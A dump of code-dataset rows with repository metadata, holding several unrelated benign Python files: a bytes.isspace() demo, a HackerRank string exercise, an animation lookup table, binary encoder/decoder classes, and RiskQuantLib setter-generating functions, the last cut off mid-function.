| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
caea3269f23342c37d22415b07d0fbcebe6a5850
| 712
|
py
|
Python
|
03/03/isspace.py
|
pylangstudy/201708
|
126b1af96a1d1f57522d5a1d435b58597bea2e57
|
[
"CC0-1.0"
] | null | null | null |
03/03/isspace.py
|
pylangstudy/201708
|
126b1af96a1d1f57522d5a1d435b58597bea2e57
|
[
"CC0-1.0"
] | 39
|
2017-07-31T22:54:01.000Z
|
2017-08-31T00:19:03.000Z
|
03/03/isspace.py
|
pylangstudy/201708
|
126b1af96a1d1f57522d5a1d435b58597bea2e57
|
[
"CC0-1.0"
] | null | null | null |
# Demonstrate isspace() on bytes and bytearray: True only when the sequence
# is non-empty and every byte is ASCII whitespace.
s = b'abc'; print(s.isspace(), s)
s = b'a-c'; print(s.isspace(), s)
s = b'a c'; print(s.isspace(), s)
s = b'a\tc'; print(s.isspace(), s)
s = b' '; print(s.isspace(), s)# three half-width (ASCII) spaces
s = b'\r\n'; print(s.isspace(), s)
#s = b' '; print(s.isspace(), s)# full-width space: SyntaxError: bytes can only contain ASCII literal characters.
s = bytearray(b'abc'); print(s.isspace(), s)
s = bytearray(b'a-c'); print(s.isspace(), s)
s = bytearray(b'a c'); print(s.isspace(), s)
s = bytearray(b'a\tc'); print(s.isspace(), s)
s = bytearray(b' '); print(s.isspace(), s)# three half-width (ASCII) spaces
s = bytearray(b'\r\n'); print(s.isspace(), s)
#s = bytearray(b' '); print(s.isspace(), s)# full-width space: SyntaxError: bytes can only contain ASCII literal characters.
| 44.5
| 112
| 0.622191
| 129
| 712
| 3.434109
| 0.162791
| 0.189616
| 0.410835
| 0.442438
| 0.954853
| 0.954853
| 0.954853
| 0.896163
| 0.873589
| 0.873589
| 0
| 0.003252
| 0.136236
| 712
| 15
| 113
| 47.466667
| 0.717073
| 0.316011
| 0
| 0
| 0
| 0
| 0.08316
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 9
|
1b0c2eef13159d2aea7fc63354f0bfc6168195e2
| 113
|
py
|
Python
|
Python/HackerRank/mutations.py
|
habibullahturkmen/kodluyoruzilkrepo
|
b438657580450b0b68fc1db140b8079738ef5a36
|
[
"MIT"
] | 2
|
2020-11-19T19:03:28.000Z
|
2021-01-04T19:52:11.000Z
|
Python/HackerRank/mutations.py
|
habibullahturkmen/kodluyoruzilkrepo
|
b438657580450b0b68fc1db140b8079738ef5a36
|
[
"MIT"
] | null | null | null |
Python/HackerRank/mutations.py
|
habibullahturkmen/kodluyoruzilkrepo
|
b438657580450b0b68fc1db140b8079738ef5a36
|
[
"MIT"
] | null | null | null |
def mutate_string(string, position, character):
    """Return a copy of ``string`` with the item at ``position`` replaced.

    The original string is untouched: everything before ``position`` is kept,
    ``character`` is substituted, and everything after is appended.
    """
    prefix = string[:position]
    suffix = string[position + 1:]
    return "".join((prefix, character, suffix))
| 37.666667
| 64
| 0.734513
| 13
| 113
| 6.307692
| 0.538462
| 0.512195
| 0.560976
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010309
| 0.141593
| 113
| 2
| 65
| 56.5
| 0.835052
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
943f247feba6100729ec0fc30040e3ba5e8aea3a
| 13,123
|
py
|
Python
|
trashguy/lut.py
|
jonatan1609/TrashGuy
|
ad26cca8d643bf74861966bc2a40321260de1d3d
|
[
"MIT"
] | 1
|
2022-03-11T00:17:22.000Z
|
2022-03-11T00:17:22.000Z
|
trashguy/lut.py
|
jonatan1609/TrashGuy
|
ad26cca8d643bf74861966bc2a40321260de1d3d
|
[
"MIT"
] | null | null | null |
trashguy/lut.py
|
jonatan1609/TrashGuy
|
ad26cca8d643bf74861966bc2a40321260de1d3d
|
[
"MIT"
] | null | null | null |
# ================================================= #
# Trash Guy Animation #
# (> ^_^)> #
# Made by Zac (trashguy@zac.cy) #
# Version 4.1.0+20201210 #
# Donate: #
# 12Na1AmuGMCQYsxwM7ZLSr1sgfZacZFYxa #
# ================================================= #
# Copyright (C) 2020 Zac (trashguy@zac.cy) #
# Permission is hereby granted, free of charge, to #
# any person obtaining a copy of this software and #
# associated documentation files (the "Software"), #
# to deal in the Software without restriction, #
# including without limitation the rights to use, #
# copy, modify, merge, publish, distribute, #
# sublicense, and/or sell copies of the Software, #
# and to permit persons to whom the Software is #
# furnished to do so, subject to the following #
# conditions: The above copyright notice and this #
# permission notice shall be included in all copies #
# or substantial portions of the Software. #
# ================================================= #
#
# ================================================= #
# If you rewrite this software in a different #
# programming language or create a derivative #
# work, please be kind and include this notice #
# and the below credit along with the license: #
# #
# This work is based on the original TrashGuy #
# animation (https://github.com/trash-guy/TrashGuy) #
# written by Zac (trashguy@zac.cy). #
# #
# ================================================= #
# Look-up table of commonly used indices for instant conversion
# Generated with generate_lut.py
_LUT = (
(0, 7), (0, 7), (0, 7), (0, 7), (0, 7), (0, 7), (0, 7), (1, 9), (1, 9),
(1, 9), (1, 9), (1, 9), (1, 9), (1, 9), (1, 9), (1, 9), (2, 11), (2, 11),
(2, 11), (2, 11), (2, 11), (2, 11), (2, 11), (2, 11), (2, 11), (2, 11),
(2, 11), (3, 13), (3, 13), (3, 13), (3, 13), (3, 13), (3, 13), (3, 13),
(3, 13), (3, 13), (3, 13), (3, 13), (3, 13), (3, 13), (4, 15), (4, 15),
(4, 15), (4, 15), (4, 15), (4, 15), (4, 15), (4, 15), (4, 15), (4, 15),
(4, 15), (4, 15), (4, 15), (4, 15), (4, 15), (5, 17), (5, 17), (5, 17),
(5, 17), (5, 17), (5, 17), (5, 17), (5, 17), (5, 17), (5, 17), (5, 17),
(5, 17), (5, 17), (5, 17), (5, 17), (5, 17), (5, 17), (6, 19), (6, 19),
(6, 19), (6, 19), (6, 19), (6, 19), (6, 19), (6, 19), (6, 19), (6, 19),
(6, 19), (6, 19), (6, 19), (6, 19), (6, 19), (6, 19), (6, 19), (6, 19),
(6, 19), (7, 21), (7, 21), (7, 21), (7, 21), (7, 21), (7, 21), (7, 21),
(7, 21), (7, 21), (7, 21), (7, 21), (7, 21), (7, 21), (7, 21), (7, 21),
(7, 21), (7, 21), (7, 21), (7, 21), (7, 21), (7, 21), (8, 23), (8, 23),
(8, 23), (8, 23), (8, 23), (8, 23), (8, 23), (8, 23), (8, 23), (8, 23),
(8, 23), (8, 23), (8, 23), (8, 23), (8, 23), (8, 23), (8, 23), (8, 23),
(8, 23), (8, 23), (8, 23), (8, 23), (8, 23), (9, 25), (9, 25), (9, 25),
(9, 25), (9, 25), (9, 25), (9, 25), (9, 25), (9, 25), (9, 25), (9, 25),
(9, 25), (9, 25), (9, 25), (9, 25), (9, 25), (9, 25), (9, 25), (9, 25),
(9, 25), (9, 25), (9, 25), (9, 25), (9, 25), (9, 25), (10, 27), (10, 27),
(10, 27), (10, 27), (10, 27), (10, 27), (10, 27), (10, 27), (10, 27),
(10, 27), (10, 27), (10, 27), (10, 27), (10, 27), (10, 27), (10, 27),
(10, 27), (10, 27), (10, 27), (10, 27), (10, 27), (10, 27), (10, 27),
(10, 27), (10, 27), (10, 27), (10, 27), (11, 29), (11, 29), (11, 29),
(11, 29), (11, 29), (11, 29), (11, 29), (11, 29), (11, 29), (11, 29),
(11, 29), (11, 29), (11, 29), (11, 29), (11, 29), (11, 29), (11, 29),
(11, 29), (11, 29), (11, 29), (11, 29), (11, 29), (11, 29), (11, 29),
(11, 29), (11, 29), (11, 29), (11, 29), (11, 29), (12, 31), (12, 31),
(12, 31), (12, 31), (12, 31), (12, 31), (12, 31), (12, 31), (12, 31),
(12, 31), (12, 31), (12, 31), (12, 31), (12, 31), (12, 31), (12, 31),
(12, 31), (12, 31), (12, 31), (12, 31), (12, 31), (12, 31), (12, 31),
(12, 31), (12, 31), (12, 31), (12, 31), (12, 31), (12, 31), (12, 31),
(12, 31), (13, 33), (13, 33), (13, 33), (13, 33), (13, 33), (13, 33),
(13, 33), (13, 33), (13, 33), (13, 33), (13, 33), (13, 33), (13, 33),
(13, 33), (13, 33), (13, 33), (13, 33), (13, 33), (13, 33), (13, 33),
(13, 33), (13, 33), (13, 33), (13, 33), (13, 33), (13, 33), (13, 33),
(13, 33), (13, 33), (13, 33), (13, 33), (13, 33), (13, 33), (14, 35),
(14, 35), (14, 35), (14, 35), (14, 35), (14, 35), (14, 35), (14, 35),
(14, 35), (14, 35), (14, 35), (14, 35), (14, 35), (14, 35), (14, 35),
(14, 35), (14, 35), (14, 35), (14, 35), (14, 35), (14, 35), (14, 35),
(14, 35), (14, 35), (14, 35), (14, 35), (14, 35), (14, 35), (14, 35),
(14, 35), (14, 35), (14, 35), (14, 35), (14, 35), (14, 35), (15, 37),
(15, 37), (15, 37), (15, 37), (15, 37), (15, 37), (15, 37), (15, 37),
(15, 37), (15, 37), (15, 37), (15, 37), (15, 37), (15, 37), (15, 37),
(15, 37), (15, 37), (15, 37), (15, 37), (15, 37), (15, 37), (15, 37),
(15, 37), (15, 37), (15, 37), (15, 37), (15, 37), (15, 37), (15, 37),
(15, 37), (15, 37), (15, 37), (15, 37), (15, 37), (15, 37), (15, 37),
(15, 37), (16, 39), (16, 39), (16, 39), (16, 39), (16, 39), (16, 39),
(16, 39), (16, 39), (16, 39), (16, 39), (16, 39), (16, 39), (16, 39),
(16, 39), (16, 39), (16, 39), (16, 39), (16, 39), (16, 39), (16, 39),
(16, 39), (16, 39), (16, 39), (16, 39), (16, 39), (16, 39), (16, 39),
(16, 39), (16, 39), (16, 39), (16, 39), (16, 39), (16, 39), (16, 39),
(16, 39), (16, 39), (16, 39), (16, 39), (16, 39), (17, 41), (17, 41),
(17, 41), (17, 41), (17, 41), (17, 41), (17, 41), (17, 41), (17, 41),
(17, 41), (17, 41), (17, 41), (17, 41), (17, 41), (17, 41), (17, 41),
(17, 41), (17, 41), (17, 41), (17, 41), (17, 41), (17, 41), (17, 41),
(17, 41), (17, 41), (17, 41), (17, 41), (17, 41), (17, 41), (17, 41),
(17, 41), (17, 41), (17, 41), (17, 41), (17, 41), (17, 41), (17, 41),
(17, 41), (17, 41), (17, 41), (17, 41), (18, 43), (18, 43), (18, 43),
(18, 43), (18, 43), (18, 43), (18, 43), (18, 43), (18, 43), (18, 43),
(18, 43), (18, 43), (18, 43), (18, 43), (18, 43), (18, 43), (18, 43),
(18, 43), (18, 43), (18, 43), (18, 43), (18, 43), (18, 43), (18, 43),
(18, 43), (18, 43), (18, 43), (18, 43), (18, 43), (18, 43), (18, 43),
(18, 43), (18, 43), (18, 43), (18, 43), (18, 43), (18, 43), (18, 43),
(18, 43), (18, 43), (18, 43), (18, 43), (18, 43), (19, 45), (19, 45),
(19, 45), (19, 45), (19, 45), (19, 45), (19, 45), (19, 45), (19, 45),
(19, 45), (19, 45), (19, 45), (19, 45), (19, 45), (19, 45), (19, 45),
(19, 45), (19, 45), (19, 45), (19, 45), (19, 45), (19, 45), (19, 45),
(19, 45), (19, 45), (19, 45), (19, 45), (19, 45), (19, 45), (19, 45),
(19, 45), (19, 45), (19, 45), (19, 45), (19, 45), (19, 45), (19, 45),
(19, 45), (19, 45), (19, 45), (19, 45), (19, 45), (19, 45), (19, 45),
(19, 45), (20, 47), (20, 47), (20, 47), (20, 47), (20, 47), (20, 47),
(20, 47), (20, 47), (20, 47), (20, 47), (20, 47), (20, 47), (20, 47),
(20, 47), (20, 47), (20, 47), (20, 47), (20, 47), (20, 47), (20, 47),
(20, 47), (20, 47), (20, 47), (20, 47), (20, 47), (20, 47), (20, 47),
(20, 47), (20, 47), (20, 47), (20, 47), (20, 47), (20, 47), (20, 47),
(20, 47), (20, 47), (20, 47), (20, 47), (20, 47), (20, 47), (20, 47),
(20, 47), (20, 47), (20, 47), (20, 47), (20, 47), (20, 47), (21, 49),
(21, 49), (21, 49), (21, 49), (21, 49), (21, 49), (21, 49), (21, 49),
(21, 49), (21, 49), (21, 49), (21, 49), (21, 49), (21, 49), (21, 49),
(21, 49), (21, 49), (21, 49), (21, 49), (21, 49), (21, 49), (21, 49),
(21, 49), (21, 49), (21, 49), (21, 49), (21, 49), (21, 49), (21, 49),
(21, 49), (21, 49), (21, 49), (21, 49), (21, 49), (21, 49), (21, 49),
(21, 49), (21, 49), (21, 49), (21, 49), (21, 49), (21, 49), (21, 49),
(21, 49), (21, 49), (21, 49), (21, 49), (21, 49), (21, 49), (22, 51),
(22, 51), (22, 51), (22, 51), (22, 51), (22, 51), (22, 51), (22, 51),
(22, 51), (22, 51), (22, 51), (22, 51), (22, 51), (22, 51), (22, 51),
(22, 51), (22, 51), (22, 51), (22, 51), (22, 51), (22, 51), (22, 51),
(22, 51), (22, 51), (22, 51), (22, 51), (22, 51), (22, 51), (22, 51),
(22, 51), (22, 51), (22, 51), (22, 51), (22, 51), (22, 51), (22, 51),
(22, 51), (22, 51), (22, 51), (22, 51), (22, 51), (22, 51), (22, 51),
(22, 51), (22, 51), (22, 51), (22, 51), (22, 51), (22, 51), (22, 51),
(22, 51), (23, 53), (23, 53), (23, 53), (23, 53), (23, 53), (23, 53),
(23, 53), (23, 53), (23, 53), (23, 53), (23, 53), (23, 53), (23, 53),
(23, 53), (23, 53), (23, 53), (23, 53), (23, 53), (23, 53), (23, 53),
(23, 53), (23, 53), (23, 53), (23, 53), (23, 53), (23, 53), (23, 53),
(23, 53), (23, 53), (23, 53), (23, 53), (23, 53), (23, 53), (23, 53),
(23, 53), (23, 53), (23, 53), (23, 53), (23, 53), (23, 53), (23, 53),
(23, 53), (23, 53), (23, 53), (23, 53), (23, 53), (23, 53), (23, 53),
(23, 53), (23, 53), (23, 53), (23, 53), (23, 53), (24, 55), (24, 55),
(24, 55), (24, 55), (24, 55), (24, 55), (24, 55), (24, 55), (24, 55),
(24, 55), (24, 55), (24, 55), (24, 55), (24, 55), (24, 55), (24, 55),
(24, 55), (24, 55), (24, 55), (24, 55), (24, 55), (24, 55), (24, 55),
(24, 55), (24, 55), (24, 55), (24, 55), (24, 55), (24, 55), (24, 55),
(24, 55), (24, 55), (24, 55), (24, 55), (24, 55), (24, 55), (24, 55),
(24, 55), (24, 55), (24, 55), (24, 55), (24, 55), (24, 55), (24, 55),
(24, 55), (24, 55), (24, 55), (24, 55), (24, 55), (24, 55), (24, 55),
(24, 55), (24, 55), (24, 55), (24, 55), (25, 57), (25, 57), (25, 57),
(25, 57), (25, 57), (25, 57), (25, 57), (25, 57), (25, 57), (25, 57),
(25, 57), (25, 57), (25, 57), (25, 57), (25, 57), (25, 57), (25, 57),
(25, 57), (25, 57), (25, 57), (25, 57), (25, 57), (25, 57), (25, 57),
(25, 57), (25, 57), (25, 57), (25, 57), (25, 57), (25, 57), (25, 57),
(25, 57), (25, 57), (25, 57), (25, 57), (25, 57), (25, 57), (25, 57),
(25, 57), (25, 57), (25, 57), (25, 57), (25, 57), (25, 57), (25, 57),
(25, 57), (25, 57), (25, 57), (25, 57), (25, 57), (25, 57), (25, 57),
(25, 57), (25, 57), (25, 57), (25, 57), (25, 57), (26, 59), (26, 59),
(26, 59), (26, 59), (26, 59), (26, 59), (26, 59), (26, 59), (26, 59),
(26, 59), (26, 59), (26, 59), (26, 59), (26, 59), (26, 59), (26, 59),
(26, 59), (26, 59), (26, 59), (26, 59), (26, 59), (26, 59), (26, 59),
(26, 59), (26, 59), (26, 59), (26, 59), (26, 59), (26, 59), (26, 59),
(26, 59), (26, 59), (26, 59), (26, 59), (26, 59), (26, 59), (26, 59),
(26, 59), (26, 59), (26, 59), (26, 59), (26, 59), (26, 59), (26, 59),
(26, 59), (26, 59), (26, 59), (26, 59), (26, 59), (26, 59), (26, 59),
(26, 59), (26, 59), (26, 59), (26, 59), (26, 59), (26, 59), (26, 59),
(26, 59), (27, 61), (27, 61), (27, 61), (27, 61), (27, 61), (27, 61),
(27, 61), (27, 61), (27, 61), (27, 61), (27, 61), (27, 61), (27, 61),
(27, 61), (27, 61), (27, 61), (27, 61), (27, 61), (27, 61), (27, 61),
(27, 61), (27, 61), (27, 61), (27, 61), (27, 61), (27, 61), (27, 61),
(27, 61), (27, 61), (27, 61), (27, 61), (27, 61), (27, 61), (27, 61),
(27, 61), (27, 61), (27, 61), (27, 61), (27, 61), (27, 61), (27, 61),
(27, 61), (27, 61), (27, 61), (27, 61), (27, 61), (27, 61), (27, 61),
(27, 61), (27, 61), (27, 61), (27, 61), (27, 61), (27, 61), (27, 61),
(27, 61), (27, 61), (27, 61), (27, 61), (27, 61), (27, 61), (28, 63),
(28, 63), (28, 63), (28, 63), (28, 63), (28, 63), (28, 63), (28, 63),
(28, 63), (28, 63), (28, 63), (28, 63), (28, 63), (28, 63), (28, 63),
(28, 63), (28, 63), (28, 63), (28, 63), (28, 63), (28, 63), (28, 63),
(28, 63), (28, 63), (28, 63), (28, 63), (28, 63), (28, 63), (28, 63),
(28, 63), (28, 63), (28, 63), (28, 63), (28, 63), (28, 63), (28, 63),
(28, 63), (28, 63), (28, 63), (28, 63), (28, 63), (28, 63), (28, 63),
(28, 63), (28, 63), (28, 63), (28, 63), (28, 63), (28, 63), (28, 63),
(28, 63), (28, 63), (28, 63), (28, 63), (28, 63), (28, 63), (28, 63),
(28, 63), (28, 63), (28, 63), (28, 63), (28, 63), (28, 63), (29, 65),
(29, 65), (29, 65), (29, 65), (29, 65), (29, 65), (29, 65), (29, 65),
(29, 65), (29, 65), (29, 65), (29, 65), (29, 65), (29, 65), (29, 65),
(29, 65), (29, 65), (29, 65), (29, 65), (29, 65), (29, 65), (29, 65),
(29, 65), (29, 65), (29, 65), (29, 65), (29, 65), (29, 65), (29, 65),
(29, 65), (29, 65), (29, 65), (29, 65), (29, 65), (29, 65), (29, 65),
(29, 65), (29, 65), (29, 65), (29, 65), (29, 65), (29, 65), (29, 65),
(29, 65), (29, 65), (29, 65), (29, 65), (29, 65), (29, 65), (29, 65),
(29, 65), (29, 65), (29, 65), (29, 65), (29, 65), (29, 65), (29, 65),
(29, 65), (29, 65), (29, 65), (29, 65), (29, 65), (29, 65), (29, 65),
(29, 65))
| 68.706806
| 77
| 0.385202
| 2,337
| 13,123
| 2.161746
| 0.065469
| 0.051465
| 0.07601
| 0.101346
| 0.827395
| 0.820269
| 0.820269
| 0.820269
| 0.820269
| 0.820269
| 0
| 0.427121
| 0.257106
| 13,123
| 190
| 78
| 69.068421
| 0.091086
| 0.135259
| 0
| 0.771242
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
9452ce29e9fc9dedc22602cc6334d4cdc769ff19
| 4,624
|
py
|
Python
|
dz/dz-04/src/evolution/encoding.py
|
Yalfoosh/AIPR
|
cd89e562682e7f868d56db2414a92c2d14d8ad8d
|
[
"Apache-2.0"
] | null | null | null |
dz/dz-04/src/evolution/encoding.py
|
Yalfoosh/AIPR
|
cd89e562682e7f868d56db2414a92c2d14d8ad8d
|
[
"Apache-2.0"
] | null | null | null |
dz/dz-04/src/evolution/encoding.py
|
Yalfoosh/AIPR
|
cd89e562682e7f868d56db2414a92c2d14d8ad8d
|
[
"Apache-2.0"
] | null | null | null |
import copy
from typing import Tuple, Union
import numpy as np
from .module import Module
from .utils import bin2dec_vector, dec2bin_vector
class BinaryEncoder(Module):
    """Encodes real values from a closed interval into fixed-width binary vectors.

    The interval is split into ``2 ** dim - 1`` quanta; a value is mapped to
    its clipped quantum index and converted to a ``dim``-bit binary vector via
    ``dec2bin_vector``.
    """

    @staticmethod
    def __check_init_args(
        dim: int, interval: Union[Tuple[Union[float, int], Union[float, int]]]
    ) -> Tuple[int, np.ndarray]:
        """Validate ``dim`` and normalise ``interval`` to a 2-element float array.

        Parameters
        ----------
        dim : int
            Number of bits of the encoding; must be a positive int.
        interval
            A (lower, upper) pair, or any iterable convertible to a tuple.
            A single-element iterable is mirrored against 0 by its sign.

        Returns
        -------
        Tuple[int, np.ndarray]
            The validated dimension and the interval as a float ndarray.

        Raises
        ------
        TypeError
            If ``dim`` is not an int or ``interval`` is not tuple-convertible.
        ValueError
            If ``dim`` < 1, ``interval`` is empty, or its bounds are reversed.
        """
        if not isinstance(dim, int):
            raise TypeError(
                f"Expected argument dim to be an int, instead it is {type(dim)}."
            )

        if dim < 1:
            raise ValueError(
                f"Expected argument dim to be a positive integer, instead it is {dim}."
            )

        if not isinstance(interval, tuple):
            try:
                interval = tuple(interval)
            except Exception:
                raise TypeError(
                    "Expected argument interval to be a tuple, instead it is "
                    f"{type(interval)}"
                )

        if len(interval) < 1:
            raise ValueError("Expected argument interval to be non-empty.")

        if len(interval) < 2:
            # Bug fix: the original compared the tuple itself to 0
            # (``interval < 0``), which raises TypeError on Python 3.  The
            # intent is to mirror the single bound around 0 based on its sign.
            interval = (interval[0], 0) if interval[0] < 0 else (0, interval[0])

        interval = interval[:2]

        if interval[0] > interval[1]:
            raise ValueError(
                "Expected argument interval to have a first item smaller than the "
                f"second one, instead it is {interval}."
            )

        # ``np.float`` was removed in NumPy 1.24; builtin ``float`` is the
        # documented replacement and yields the same float64 dtype.
        interval = np.array(interval, dtype=float)

        return dim, interval

    def __init__(
        self, dim: int, interval: Union[Tuple[Union[float, int], Union[float, int]]]
    ):
        """Create an encoder producing ``dim``-bit codes over ``interval``."""
        self.__dim, self.__interval = self.__check_init_args(dim=dim, interval=interval)
        self.__max_value = int(2 ** dim) - 1
        # Bug fix: compute the quantum from the *validated* interval rather
        # than the raw argument; the raw value may be a single-element
        # iterable that the check expanded into a (lower, upper) pair.
        self.__quantum = (self.__interval[1] - self.__interval[0]) / self.max_value

    @property
    def dim(self):
        # Number of bits per encoded value.
        return self.__dim

    @property
    def interval(self):
        # Validated (lower, upper) bounds as a float ndarray.
        return self.__interval

    @property
    def quantum(self):
        # Width of one quantization step.
        return self.__quantum

    @property
    def max_value(self):
        # Largest representable quantum index: 2 ** dim - 1.
        return self.__max_value

    def _input_to_int(self, x) -> int:
        """Map ``x`` to its quantum index, clipped to [0, max_value]."""
        # ``np.int`` was removed in NumPy 1.24; builtin ``int`` is equivalent.
        return np.maximum(
            0, np.minimum(self.max_value, (x - self.interval[0]) / self.quantum)
        ).astype(int)

    def apply(self, x):
        """Encode ``x`` into its binary representation via ``dec2bin_vector``."""
        x_int = self._input_to_int(x)
        return dec2bin_vector(x_int, self.dim)

    def __str__(self):
        return f"BinaryEncoder({self.dim} bit, {self.interval})"
class BinaryDecoder(Module):
    """Decodes fixed-width binary vectors back into real values of an interval.

    Inverse of ``BinaryEncoder``: the integer value of a ``dim``-bit code
    (obtained via ``bin2dec_vector``) is scaled by the quantum and shifted by
    the interval's lower bound.
    """

    @staticmethod
    def __check_init_args(
        dim: int, interval: Union[Tuple[Union[float, int], Union[float, int]]]
    ) -> Tuple[int, np.ndarray]:
        """Validate ``dim`` and normalise ``interval`` to a 2-element float array.

        Parameters
        ----------
        dim : int
            Number of bits of the encoding; must be a positive int.
        interval
            A (lower, upper) pair, or any iterable convertible to a tuple.
            A single-element iterable is mirrored against 0 by its sign.

        Returns
        -------
        Tuple[int, np.ndarray]
            The validated dimension and the interval as a float ndarray.

        Raises
        ------
        TypeError
            If ``dim`` is not an int or ``interval`` is not tuple-convertible.
        ValueError
            If ``dim`` < 1, ``interval`` is empty, or its bounds are reversed.
        """
        if not isinstance(dim, int):
            raise TypeError(
                f"Expected argument dim to be an int, instead it is {type(dim)}."
            )

        if dim < 1:
            raise ValueError(
                f"Expected argument dim to be a positive integer, instead it is {dim}."
            )

        if not isinstance(interval, tuple):
            try:
                interval = tuple(interval)
            except Exception:
                raise TypeError(
                    "Expected argument interval to be a tuple, instead it is "
                    f"{type(interval)}"
                )

        if len(interval) < 1:
            raise ValueError("Expected argument interval to be non-empty.")

        if len(interval) < 2:
            # Bug fix: the original compared the tuple itself to 0
            # (``interval < 0``), which raises TypeError on Python 3.  The
            # intent is to mirror the single bound around 0 based on its sign.
            interval = (interval[0], 0) if interval[0] < 0 else (0, interval[0])

        interval = interval[:2]

        if interval[0] > interval[1]:
            raise ValueError(
                "Expected argument interval to have a first item smaller than the "
                f"second one, instead it is {interval}."
            )

        # ``np.float`` was removed in NumPy 1.24; builtin ``float`` is the
        # documented replacement and yields the same float64 dtype.
        interval = np.array(interval, dtype=float)

        return dim, interval

    def __init__(
        self, dim: int, interval: Union[Tuple[Union[float, int], Union[float, int]]]
    ):
        """Create a decoder for ``dim``-bit codes over ``interval``."""
        self.__dim, self.__interval = self.__check_init_args(dim=dim, interval=interval)
        self.__max_value = int(2 ** dim) - 1
        # Bug fix: compute the quantum from the *validated* interval rather
        # than the raw argument; the raw value may be a single-element
        # iterable that the check expanded into a (lower, upper) pair.
        self.__quantum = (self.__interval[1] - self.__interval[0]) / self.max_value

    @property
    def dim(self):
        # Number of bits per encoded value.
        return self.__dim

    @property
    def interval(self):
        # Validated (lower, upper) bounds as a float ndarray.
        return self.__interval

    @property
    def max_value(self):
        # Largest representable quantum index: 2 ** dim - 1.
        return self.__max_value

    @property
    def quantum(self):
        # Width of one quantization step.
        return self.__quantum

    def apply(self, x):
        """Decode binary vector(s) ``x`` back into real values."""
        x_int = bin2dec_vector(x)
        return (x_int * self.quantum) + self.interval[0]

    def __str__(self):
        return f"BinaryDecoder({self.dim} bit, {self.interval})"
| 28.54321
| 88
| 0.570502
| 554
| 4,624
| 4.604693
| 0.144404
| 0.042336
| 0.040768
| 0.061152
| 0.857703
| 0.827127
| 0.813799
| 0.787534
| 0.787534
| 0.759702
| 0
| 0.011912
| 0.328287
| 4,624
| 161
| 89
| 28.720497
| 0.809401
| 0
| 0
| 0.793388
| 0
| 0
| 0.169983
| 0.010381
| 0
| 0
| 0
| 0
| 0
| 1
| 0.140496
| false
| 0
| 0.041322
| 0.090909
| 0.322314
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
846e9b279c5c949fb081082e73654a4ef241f44d
| 14,209
|
py
|
Python
|
RiskQuantLib/Build/buildFuction.py
|
SyuyaMurakami/RiskQuantLib-Doc
|
2503befc24c2e422e51f8b9f468c8d8439e11c65
|
[
"MIT"
] | 1
|
2021-12-29T12:18:45.000Z
|
2021-12-29T12:18:45.000Z
|
RiskQuantLib/Build/buildFuction.py
|
SyuyaMurakami/RiskQuantLib-Doc
|
2503befc24c2e422e51f8b9f468c8d8439e11c65
|
[
"MIT"
] | null | null | null |
RiskQuantLib/Build/buildFuction.py
|
SyuyaMurakami/RiskQuantLib-Doc
|
2503befc24c2e422e51f8b9f468c8d8439e11c65
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
#coding = utf-8
def buildStringFunction(variableNameString: str):
    """Build the source of a ``set<Name>`` method for a 'String' attribute.

    The generated setter simply assigns the given value to ``self.<name>``.

    Parameters
    ----------
    variableNameString : str
        The variable name you want to use; it becomes the attribute name
        of the class.

    Returns
    -------
    code : codeBuilder Object
        Holds the generated setter source.
    """
    from RiskQuantLib.Tool.codeBuilderTool import codeBuilder

    setterName = "set" + variableNameString[0].capitalize() + variableNameString[1:]
    code = codeBuilder(indent=4)
    code.add_line(f"def {setterName}(self, {variableNameString}String):")
    code.indent()
    code.add_section()
    code.add_line(f"self.{variableNameString} = {variableNameString}String")
    code.dedent()
    code.get_globals()
    return code
def buildNumberFunction(variableNameString: str):
    """Build the source of a ``set<Name>`` method for a 'Number' attribute.

    The generated setter wraps the value in a
    ``RiskQuantLib.Property.NumberProperty.numberProperty`` instance on first
    call and updates that instance on subsequent calls.

    Parameters
    ----------
    variableNameString : str
        The variable name you want to use; it becomes the attribute name
        of the class.

    Returns
    -------
    code : codeBuilder Object
        Holds the generated setter source.
    """
    from RiskQuantLib.Tool.codeBuilderTool import codeBuilder

    name = variableNameString
    setterName = "set" + name[0].capitalize() + name[1:]
    code = codeBuilder(indent=4)
    code.add_line(f"def {setterName}(self, {name}Num):")
    code.indent()
    code.add_section()
    code.add_line("from RiskQuantLib.Property.NumberProperty.numberProperty import numberProperty")
    code.add_line(f"if not hasattr(self, '_{name}'):")
    code.indent()
    code.add_line(f"self._{name} = numberProperty({name}Num)")
    code.add_line(f"self._{name}.setBelongTo(self,'{name}')")
